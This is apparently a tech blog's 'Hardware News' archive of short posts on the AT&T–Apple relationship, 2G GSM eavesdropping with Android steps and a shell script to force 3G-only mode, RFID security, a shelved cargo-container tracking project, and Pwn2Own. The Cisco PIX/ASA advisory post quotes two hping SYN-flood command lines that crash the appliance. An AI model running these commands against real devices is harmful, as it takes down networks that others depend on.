Archive for the ‘Hardware News’ Category

One of the good things about long airport layovers is the chance you finally get to catch up on your reading, which is what it finally took to crack open my last issue of Wired magazine. I must say I was quite amused to find an article outlining the love/hate relationship between AT&T and Apple. Since I have never been an Apple fan I usually just tune out most news related to them, which may explain why many of the details in the article were new to me. The tale ends up being a good example of a “FAILationship”, and the fact that it starred two of my favorite US corporations just made it that much more comical. Read the article Here

Meanwhile, no matter how frustrated AT&T got with Jobs, it had little choice but to stand by him. It would have been devastating to lose the iPhone after investing billions of dollars and endless reputational capital. And so the relationship carried on, dysfunctional and loveless though it was. Divorce, at least for the time being, was not an option.

iphone blowup

Freshly back from a new round of security-based conferences, I will take a moment to point out one of the more interesting topics for me this time around:
the discussion on Cell Phone Spying (not that I made it inside the actual talk with the ungodly line). More specifically, how by using a frequency flooding technique on 2G networks it's possible to do a MiTM type of eavesdrop on conversations & data. You can read more about it Here

As mentioned in the article a workaround for this issue would be to disable 2G mode on GSM phones.

Here is the quick and dirty way to do this in Android (tested on a rooted phone)
DISCLAIMER: Forcing 3G mode will use more battery life
Also if you're not on GSM don’t try this @ home…duh

Open Dialer and Enter: *#*#4636*#*#
After inputting the number you will be presented with a “Testing” menu
Choose “Phone Information”
Scroll all the way down to “Set preferred network type” and change this setting to WCDMA_only
That’s it!
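
To confirm the change took effect, the setting can be read back over adb. This is an added example, not part of the original post or the forum fix: it assumes USB debugging is enabled, that the build stores the choice under the `preferred_network_mode` global setting, and that mode numbers follow AOSP's RILConstants `NETWORK_MODE_*` values (2 = WCDMA only). Unrecognised values are reported as unknown rather than assumed safe.

```shell
#!/bin/sh
# Added example: audit whether the preferred network mode still permits GSM (2G).
# Assumption: mode numbers match AOSP RILConstants NETWORK_MODE_* (0-12).

# classify_mode MODE: print gsm, no-gsm or unknown for one numeric mode
classify_mode() {
    case "$1" in
        0|1|3|7|9|10)    echo gsm ;;      # every mode that includes GSM
        2|4|5|6|8|11|12) echo no-gsm ;;   # WCDMA-only, CDMA/EvDo, LTE without GSM
        *)               echo unknown ;;  # newer or vendor modes: do not assume safe
    esac
}

# audit_setting RAW: RAW is the stored value; multi-SIM devices store one
# mode per slot, comma separated (e.g. "2,9"). Worst slot wins.
audit_setting() {
    verdict=no-gsm
    raw=$(printf '%s' "$1" | tr -d ' \r')   # adb output may carry CR
    [ -n "$raw" ] || { echo unknown; return; }
    old_ifs=$IFS; IFS=,
    for mode in $raw; do
        case "$(classify_mode "$mode")" in
            gsm)     verdict=gsm ;;
            unknown) [ "$verdict" = gsm ] || verdict=unknown ;;
        esac
    done
    IFS=$old_ifs
    echo "$verdict"
}

# Query an attached handset only when asked to: ./check2g.sh --device
if [ "${1:-}" = "--device" ]; then
    audit_setting "$(adb shell settings get global preferred_network_mode)"
fi
```

A result of `gsm` means at least one SIM slot can still fall back to 2G; the radio may also revert the setting after a reboot or SIM swap, so it is worth re-checking.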

Droid 3G Only Mode

I take no credit for the fix above, as it was posted on the android dev forums.
Also, this protects you from this exploit and any others targeting 2G only, but many other GSM insecurities still exist. Another related topic also discussed was using a TOR client to obfuscate your traffic and make yourself much more anonymous. I will cover this topic a bit more in some upcoming Android-based posts.

RSA researcher Ari Juels sat down with to discuss various topics, one of which was the constrained capabilities of RFID (like wireless bar codes) and how they affect the security posture needed to secure these devices.

But, in fact, it’s possible to shoehorn in capabilities for which these tags were not explicitly designed. For example, in RSA Labs, we proposed techniques to commandeer access control features on the tags — those are an optional security mechanism — and even the privacy feature on the tags, what’s called the “kill” function, a self-destruct feature that’s meant to protect consumer privacy. We’ve shown ways the tags can be commandeered for authentication.

Read More Here …

Suffering the same fate as many other technology projects during our economic slowdown, it appears the CommerceGuard project has had its operations suspended by GE. The CommerceGuard project was responsible for development of the CommerceGuard Container Security Device System (CSD), whose purpose was to track and secure shipment containers. The system was developed to meet the needs set forth by the Department of Homeland Security (DHS), which called for

a sophisticated security system within the electronics industry that can detect unauthorized breaches on all six sides of a standard cargo container or an intrusion through the door while also monitor and relay conditions inside the container such as humidity temperature and oxygen levels.

Put simply:
A more effective and secure way to track and audit who is accessing shipped cargo containers before they hit our shorelines.

Still, early February of this year began to signal the beginning of the end for the project, when it appeared that GE was not interested in further testing the technology. This came just prior to a critical round of testing by DHS. Perhaps the reason for the hesitation in further testing was that the solution uses RFID technology, a technology proven long ago to be susceptible to hijacking & hacking attempts. The company cited a variety of reasons, from developmental costs and speed of updated data to maintenance costs.

A bit more on the CSD technology concept.
It uses 2 devices to monitor whenever a cargo container is opened or closed. The internal wall sensor & the door sensor work in unison to monitor and make a note of the date, time, and location of containers as they are accessed. It will also audit the number of times this information has been queried and by whom. This process is kicked off by the shipper as they seal and virtually “Lock” their container using a handheld mobile device. This information can be referenced by receiving ports, and containers can be either inspected or cleared based partly on this type of access audit. It can also be exported to various standardized data formats.

EDIT: This post was edited to correct inaccuracies on some of the details provided. Apologies for the Error..

Some fairly critical issues have been disclosed in a very popular security product.

Cisco PIX Security Appliance and ASA 5500 Series Adaptive Security Appliance are prone to multiple denial-of-service vulnerabilities, an ACL-bypass vulnerability, and an authentication-bypass vulnerability.

Read More Here …
An attacker can use readily available network utilities to exploit these issues.
The following example data is sufficient to exploit the denial-of-service issue affecting PIX and ASA:

/*Utilize 1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a

As an avid user of the Google Phone, and someone who LOVES the Android OS, I have added a new section to the site: “LSYiPDT”, or Let’s see your iPhone do this. Now it would be easy to point out the obvious tasks like run background apps, cut/paste, scan barcodes, last longer than 24hrs w/o a recharge, or not be monopolized by AT&(I will feed your private info to the US government)T. But to prevent fan-boy flamage we will try to stick with the more advanced tasks that really set Android apart from the whack…err..pack.

Those cool guys at Hack-A-Day have a fun article on how to hack your old Atari system to make it S-Video compatible, thus making it actually usable without that old TV slider switch. I think this will be a good reference to perform a similar hack on my ancient Tandy PC that I really want to see boot up again. Wonder what I can get to run on this old Tandy to make it useful again, and where did I put all those old floppy disks and program cartridges?

Read More on the S-Video hack here

Since I did not get out to Black Hat DC last month I was just reviewing the papers and came across one very interesting one. Aside from the white paper I also enjoyed the story about the new “Friends” disclosing such an exploit brings. All in all a good read and just more wood for the fires of security threats in our digital age. I should point out that the founder and CEO of the company to disclose this is pretty hot, and the fact that she is smart and can hack increases the hot meter by at least x10.

Read more about it here

The hacker best known for hacking the iPhone shares some information about hacking fully patched MacBooks in under 2 min during the PWN2OWN security competition.

Yes, I took down the Mac in under a minute each time. However, this doesn’t show the fact that I spent many days doing research and writing the exploit before the day of the competition. It only looks Hollywood because you don’t see the hard work in the preparation. If you set me down in front of an application I’ve never seen before and told me I have 2 minutes to hack it, as is often the case in movies, I’d have no more luck than your grandma at accomplishing it. Well, maybe a little more of a chance, but not much!

As for comparing this to other competitions, most other competitions face teams of hackers against programs written for the contest with bugs purposely added. I like Pwn2Own because it's against real software and the bugs found are real bugs and are given to the vendors to fix, so some good comes out of it too.

Similar to the functions of the new Kindle device, a new high-tech document scanner with OCR functions built in will not only scan documents or books for you but also read them back to you.

Now if only it could turn its own pages!

Plustek Reader